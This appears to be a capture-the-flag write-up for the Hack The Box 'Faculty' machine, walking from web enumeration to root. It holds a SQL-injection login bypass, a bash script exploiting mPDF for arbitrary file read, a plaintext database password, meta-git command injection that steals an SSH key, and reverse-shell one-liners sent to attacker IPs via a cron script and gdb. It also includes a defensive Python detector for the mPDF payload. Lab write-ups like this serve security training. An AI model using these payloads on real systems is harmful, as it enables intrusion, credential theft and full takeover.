
TL;DR
NETWORK


SCANS
feroxbuster --url http://faculty.htb --wordlist /usr/share/wordlists/dirb/big.txt --silent -x php,txt

ENUMERATION


discovery
ffuf -w /usr/share/wordlists/dirb/big.txt -u http://faculty.htb/admin/ajax.php\?action\=FUZZ -v -fs 0




curl -X POST -d "firstname=tom&lastname=tom&[email protected]&password=tom123" http://faculty.htb/admin/ajax.php\?action\=signup


SQLi



SQLMap
Let's record the request in a file and run sqlmap against it.

sqlmap identified the username field as vulnerable.



We can see our user "tom" in the database, created with the following POST:
curl -X POST -d "firstname=tom&lastname=tom&[email protected]&password=tom123&bio=whatver&login_alumnus_id=10" http://faculty.htb/admin/ajax.php\?action\=signup
Unfortunately, for unknown reasons this user could not log in to the site.
FOOTHOLD
Admin login page


Using the payload jyot' or 1=1# in both the username and password fields bypasses the admin login page.

PDF download




Fuzzing




We get an interesting error.

Looking at the properties of one of the PDFs, we found the software responsible for generating them: mPDF 6.0.

Exploit
Looking into mPDF, we can see that it is possible to inject HTML code into a PDF document generated by mPDF, as described here: https://github.com/mpdf/mpdf/issues/356. More details on this vulnerability can be found in this blog post: https://medium.com/@jonathanbouman/local-file-inclusion-at-ikea-com-e695ed64d82f

Thanks to this article, we crafted a quick bash script to exploit the arbitrary file read by sending the following payload (URL-encoded twice, then base64-encoded):
<annotation file="FILE_TO_READ" content="FILE_TO_READ" icon="Graph" title="Attached File: FILE_TO_READ" pos-x="195" />
The bash script:
#!/usr/bin/env bash
# Session cookie of the logged-in admin and the file to read
COOKIE='bhbesvscj7t11kqlslcoupihe7'
MFILE='/etc/passwd'
# mPDF annotation tag that attaches the given local file to the generated PDF
TMP="<annotation file=\"$MFILE\" content=\"${MFILE}\" icon=\"Graph\" title=\"Attached File: ${MFILE}\" pos-x=\"195\" />"
# The application expects the HTML URL-encoded twice, then base64-encoded
ENCODED_TMP="$(php -r 'echo rawurlencode($argv[1]);' -- "$TMP")"
ENCODED_TMP="$(php -r 'echo rawurlencode($argv[1]);' -- "$ENCODED_TMP")"
# -w0 avoids line wrapping, which would corrupt the POST body
BASE64="$(printf '%s' "$ENCODED_TMP" | base64 -w0)"
# The response body is the name of the generated PDF
PDF="$(curl --silent -X POST -d "pdf=$BASE64" -b "PHPSESSID=$COOKIE" http://faculty.htb/admin/download.php)"
printf '\n\ncurl -b %s -O http://faculty.htb/mpdf/tmp/%s\n' "'PHPSESSID=$COOKIE'" "$PDF"
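As an added defensive illustration (not code from the write-up or from the mPDF project), the following Python reproduces the decoding chain described above for the pdf parameter (base64, then two rounds of URL-decoding) and rejects any request whose HTML contains an mPDF <annotation file=...> attachment before it reaches the renderer; the function and parameter names are assumptions, and the encoding helper exists only to build the test inputs.

```python
import base64
from html.parser import HTMLParser
from urllib.parse import quote, unquote


def decode_pdf_param(value: str) -> str:
    """Undo the encoding the client applies to the 'pdf' parameter:
    base64, then two rounds of URL-encoding (as observed in the write-up)."""
    raw = base64.b64decode(value, validate=True).decode("utf-8", errors="replace")
    return unquote(unquote(raw))


class _TagCollector(HTMLParser):
    """Collects every (tag, attributes) pair, including self-closing tags."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag.lower(), dict(attrs)))

    def handle_startendtag(self, tag, attrs):
        self.tags.append((tag.lower(), dict(attrs)))


def find_file_annotations(html: str) -> list:
    """Return the local paths referenced by <annotation file=...> tags
    (mPDF's file-attachment tag) so the request can be rejected and logged."""
    parser = _TagCollector()
    parser.feed(html)
    parser.close()
    return [a["file"] for t, a in parser.tags if t == "annotation" and a.get("file")]


def is_safe_pdf_request(value: str) -> bool:
    """True only when the parameter decodes cleanly and carries no file attachment."""
    try:
        html = decode_pdf_param(value)
    except (ValueError, UnicodeDecodeError):
        return False  # undecodable input is refused rather than handed to mPDF
    return not find_file_annotations(html)


def encode_like_client(html: str) -> str:
    """Constructed helper mirroring the bash script's encoding chain (test input only)."""
    return base64.b64encode(quote(quote(html, safe="")).encode()).decode()
```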
Enumeration
Using the script we managed to retrieve the file /etc/passwd, which gave us an idea of the users present on the machine.

A search on the internet revealed the file structure of "School Faculty Scheduling System" (https://www.campcodes.com/downloads/school-faculty-scheduling-system-using-php-mysql-source-code/), so we went after the following file: /var/www/scheduling/admin/db_connect.php

which revealed the database credentials:
sched:Co.met06aci.dly53ro.per
Low access as user gbyolo
We were able to obtain SSH access to the machine as the user gbyolo using the password found in the previous step.

PRIV ESCALATION
Enum
We are able to run the binary meta-git as the user developer.

We can run commands as developer with:
sudo -u developer meta-git

Retrieve the developer user's SSH key
A bit of googling led us to https://github.com/advisories/GHSA-qcff-ffx3-m25c
All versions of meta-git are vulnerable to Command Injection. The package fails to sanitize input and passes it directly to an exec call, which may allow attackers to execute arbitrary code in the system. The clone command is vulnerable through the branch name.
According to this advisory, we can run
meta-git clone 'sss||touch HACKED' # *HACKED* file is created
where touch HACKED is an arbitrary, unsanitized command.
As shown in the following image, the exploit runs as developer:


sudo -u developer meta-git clone "sss||cat /home/developer/.ssh/id_rsa"

Using this SSH key we can now access the developer user's account.

Root access


Using pspy to snoop on the processes, we can see that the script sendmail.sh is being called repeatedly (probably from a cron job).

Knowing this, let's replace the mail command in sendmail.sh with our payload:
echo '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.16.9/1235 0>&1"' > sendmail.sh

Alternatively, attach gdb to the root-owned python3 process and call system() from inside it:
export PID=$(ps aux | grep "^root.*python3" | awk '{print $2}')
gdb -p $PID
call (void)system("bash -c 'bash -i >& /dev/tcp/10.10.x.x/9001 0>&1'")
